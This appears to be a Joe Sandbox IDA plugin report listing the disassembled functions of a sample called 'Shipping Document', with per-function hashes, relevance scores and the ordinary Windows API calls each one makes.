Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 04218b4f00b4063eb70ebc0df6de360b3d46488dbd237ccd725e5b0b489d5441
Instruction ID: e8311ddb88a1bd83947fa896efd640e2458f0103f0f77279b77a8a989d35e4c0
Opcode Fuzzy Hash: 04218b4f00b4063eb70ebc0df6de360b3d46488dbd237ccd725e5b0b489d5441
Instruction Fuzzy Hash: 2E31E2B150021AEFDB14CF6CD98CA9E7BB6EB04315F00825AFAA4A71D5C3B49A14CB50

Function 0101B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0101B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0101B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0101B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0101B742
_wcsstr.LIBCMT ref: 0101B74C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 0d99a397110bc4868b39076c4647db3420bd1a5733c829bde95c27bb34c6ef26
Instruction ID: 6ba0d5035523cbbc7e5efd354a5a689020c9b46c54dc09a0e33df1208e7ec17e
Opcode Fuzzy Hash: 0d99a397110bc4868b39076c4647db3420bd1a5733c829bde95c27bb34c6ef26
Instruction Fuzzy Hash: 12212672204244BBEB255B3E9D49E7B7BFCEF49760F044069FD49CA195EF69C84093A0

Function 0104B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

GetWindowLongW.USER32(?,000000F0), ref: 0104B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0104B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0104B489
GetSystemMetrics.USER32(00000004), ref: 0104B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01031184,00000000), ref: 0104B4D0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: db35d7d80c8eb441ebec5811e5755a30a878b386792104cf0bfdee1bc9db3705
Instruction ID: e5fb8a4b3932eecb04c1d6dd58f83a5ad5bb868172b7df00017058fba20510fc
Opcode Fuzzy Hash: db35d7d80c8eb441ebec5811e5755a30a878b386792104cf0bfdee1bc9db3705
Instruction Fuzzy Hash: FE2191B1914226AFDB609E3CCC84B6A3BA4FB45720F114778FAA6D21D0EB31D811CB90

Function 010197E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01019802

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01019834
__itow.LIBCMT ref: 0101984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01019874
__itow.LIBCMT ref: 01019885

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 8925aad39b58a5547b167b2afdbb38db72fd114280654bc16c6fcd381866a5b9
Instruction ID: 13b15512053ac1b3542e15c554a1d0200f842e123497d3286a06cd652d059443
Opcode Fuzzy Hash: 8925aad39b58a5547b167b2afdbb38db72fd114280654bc16c6fcd381866a5b9
Instruction Fuzzy Hash: 2D210A71B00305FBEB10BA798D8AEEE3BA9EF48714F040069FE45DB241D6788D419791

Function 00FC12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
SelectObject.GDI32(?,00000000), ref: 00FC135C
BeginPath.GDI32(?), ref: 00FC1373
SelectObject.GDI32(?,00000000), ref: 00FC139C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 3bd501c344f92b074081890cf2de0605a17b1f5d74c1cbb326e99afa883fe277
Instruction ID: 285cf9a5721d85fc1a86354edc4ff8600707ef4d5e173e2947f373fae6d76dd6
Opcode Fuzzy Hash: 3bd501c344f92b074081890cf2de0605a17b1f5d74c1cbb326e99afa883fe277
Instruction Fuzzy Hash: 6E21D8B0C14346DFDB208F54DA09B6D3BB8FB11325F21431AF4C496195D37B8861EB50

Function 0101C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0101C176
_memcmp.LIBCMT ref: 0101C194
_memcmp.LIBCMT ref: 0101C1A7
_memcmp.LIBCMT ref: 0101C1BF
_memcmp.LIBCMT ref: 0101C1D7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0a5f63327d2465eddcffd203a53d9a1c057f09a1cc79abbe4c196ca81c9e347d
Instruction ID: 105a7c774b4b7a498366bdbadfb5594413ad25c1b1692578232a98344219d1c3
Opcode Fuzzy Hash: 0a5f63327d2465eddcffd203a53d9a1c057f09a1cc79abbe4c196ca81c9e347d
Instruction Fuzzy Hash: 3601D8B26C4109BBF345A6275E42FAF77DCAF12294F444029FD449B247F768DE1182E2

Function 01024D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01024D5C
__beginthreadex.LIBCMT ref: 01024D7A
MessageBoxW.USER32(?,?,?,?), ref: 01024D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01024DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01024DAC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 4c70bc6909359a4a9e1a26499329bb76844ab268c4ec41b8bd577bfb380cf0b3
Instruction ID: cde8718004b4ec5dede15c02f3de5f29073e141c155bbe66d1b384108756a42c
Opcode Fuzzy Hash: 4c70bc6909359a4a9e1a26499329bb76844ab268c4ec41b8bd577bfb380cf0b3
Instruction Fuzzy Hash: AB1148B6908654BBC7219BACDC44ADE7FECEB45320F144299F994D7241C67A880087A0

Function 0101874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 836962771244ec751f94f338de551ddff6c401da8c17cdfb2fb97b08879c5ab7
Instruction ID: 2e54191a8609b46b0a57ac1ad7ae4110666099a3eaf325f6e1027d39f90f5911
Opcode Fuzzy Hash: 836962771244ec751f94f338de551ddff6c401da8c17cdfb2fb97b08879c5ab7
Instruction Fuzzy Hash: B4016DB5200205BFDB245FBADD88D6B7FACFF8A255710446AF989C3254DA36D910CB60

Function 010254E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01025502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01025510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01025518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01025522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 152eaff66b44b3a3c7d4f9b83fed886350595421e1a9360dca2fa1e7d89e122b
Instruction ID: 5f7ffa095f2bf7c7ab9b9af4aa93416d932bd7c61ac326203c4f39d376ef389b
Opcode Fuzzy Hash: 152eaff66b44b3a3c7d4f9b83fed886350595421e1a9360dca2fa1e7d89e122b
Instruction Fuzzy Hash: 25015B75D0063ADBCF10EFE8ED986EDBBB8BB09711F440086E981F2144DB355550C7A5

Function 01017652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?,?,0101799D), ref: 0101766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 0101768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 01017698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?), ref: 010176A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 010176B4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 839eb21d80e7c7c2e8108816e9ebdd5aac26e45f5ef53d926a20ae304b9c4ba5
Instruction ID: add02ab5f85eb72815dd00ab5230874340bc5fc4c57876d06de4861a8ff190d4
Opcode Fuzzy Hash: 839eb21d80e7c7c2e8108816e9ebdd5aac26e45f5ef53d926a20ae304b9c4ba5
Instruction Fuzzy Hash: 7401D4B6600215BBEB204F5CDD44BAA7FECEB48651F100458FE84D7209E73ADD4087A0

Function 010185F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01018608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01018612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01018621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01018628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101863E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c3dfc44b8b9bcfe44fabf1363e2099b3dd22bd651c1f0b8eb44abfd9f231c494
Instruction ID: 2d902fd6c6d9e3c6065a5b5f360881ee9dd2d26e16cdf2ed2b2dab050d9e25f0
Opcode Fuzzy Hash: c3dfc44b8b9bcfe44fabf1363e2099b3dd22bd651c1f0b8eb44abfd9f231c494
Instruction Fuzzy Hash: 89F0C274200205AFEB211FACDDCDE6B3FECEF8A654B004416F985C2144CB7A9841DB60

Function 01018652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01018669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01018673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01018682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01018689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101869F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 83c8a4195c52cbc4219a1437379f22a30da04584553153869cbb5558aef0cc81
Instruction ID: 37cafa33ecd0e9b2cf7e5929c6106e780d43075ec18cba96de8a2df1e087739a
Opcode Fuzzy Hash: 83c8a4195c52cbc4219a1437379f22a30da04584553153869cbb5558aef0cc81
Instruction Fuzzy Hash: 3DF0AFB8200205AFEB211FA8ECC8E673FECEF8A654B100416F985D3144CA6A9900DB60

Function 0101C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0101C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0101C6D1
MessageBeep.USER32(00000000), ref: 0101C6E9
KillTimer.USER32(?,0000040A), ref: 0101C705
EndDialog.USER32(?,00000001), ref: 0101C71F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 2cd56716015c8835c56a4ac54069eb42b5872eb319d6c27efd2667ff021f458d
Instruction ID: a2a7017dde3e599d4010475c06071e0801866a0f917274196292a7f198dc57cf
Opcode Fuzzy Hash: 2cd56716015c8835c56a4ac54069eb42b5872eb319d6c27efd2667ff021f458d
Instruction Fuzzy Hash: CE0184744403059BFB315B28EE8EF967BB8BB04701F00055DB6C2A14D5DBE9A9548B40

Function 00FC13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00FC13BF
StrokeAndFillPath.GDI32(?,?,00FFBAD8,00000000,?), ref: 00FC13DB
SelectObject.GDI32(?,00000000), ref: 00FC13EE
DeleteObject.GDI32 ref: 00FC1401
StrokePath.GDI32(?), ref: 00FC141C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 074c43ccbdacd7533ee2dd18179fbc750fad4789cd7adc404a931943a2365642
Instruction ID: 87fcf251aebb0c5b770dc831b0d7e01da6fda73d6f06ef1569dc3325bf897e8f
Opcode Fuzzy Hash: 074c43ccbdacd7533ee2dd18179fbc750fad4789cd7adc404a931943a2365642
Instruction Fuzzy Hash: B6F06DB001824ADBDB354F1AEA4DB583BA4BB12326F148318F4E9440E9C33B44A1DF10

Function 00FD2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 00FC7BB1: _memmove.LIBCMT ref: 00FC7C0B

__swprintf.LIBCMT ref: 00FD302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FD2EC6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 5e32bc905b0ec3d8e123281b7c8592c0e3bf05346aa83f0403d063ac7cd6e5d9
Instruction ID: 742775c3b814423c10435a5aa599de400b6bc14e6fb83201a3450bdb8db0915b
Opcode Fuzzy Hash: 5e32bc905b0ec3d8e123281b7c8592c0e3bf05346aa83f0403d063ac7cd6e5d9
Instruction Fuzzy Hash: 5F91AD311083029FD718EF24CD8AD6EB7E5EF85710F44091EF5829B2A1DA75EE44EB52

Function 0102BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE

CoInitialize.OLE32(00000000), ref: 0102BC26
CoCreateInstance.OLE32(01052D6C,00000000,00000001,01052BDC,?), ref: 0102BC3F
CoUninitialize.OLE32 ref: 0102BC5C

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

Strings

.lnk, xrefs: 0102BC08, 0102BC16

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: adc63f5b52937f71221e8bda5c9e224d4b19c45c57bfd46ea213e0e4f8369d91
Instruction ID: 0580efa5a4c143113801fba1d5ed9c7c212355da90d1b7f56c0e5bf1cba1d676
Opcode Fuzzy Hash: adc63f5b52937f71221e8bda5c9e224d4b19c45c57bfd46ea213e0e4f8369d91
Instruction Fuzzy Hash: FAA143752043129FCB00DF18C985E6ABBE5FF88714F14898CF8999B261CB35ED45CB92

Function 00FE524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FE52DD

Part of subcall function 00FF0340: __87except.LIBCMT ref: 00FF037B

Strings

pow, xrefs: 00FE52B5, 00FE52D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 5b35b51a5797108f38b2e8186dfcf873787688cedeb0239a9027b829037d5f72
Instruction ID: 6fc721b7d2ecc9dbcc453789b9c9abc61962f2b30455635a6f7252886e7f4a25
Opcode Fuzzy Hash: 5b35b51a5797108f38b2e8186dfcf873787688cedeb0239a9027b829037d5f72
Instruction Fuzzy Hash: ED51AE71E0974987CB21B625C94137E3B91AF00B64F608D59E2D5812FBEF798CC4BB42

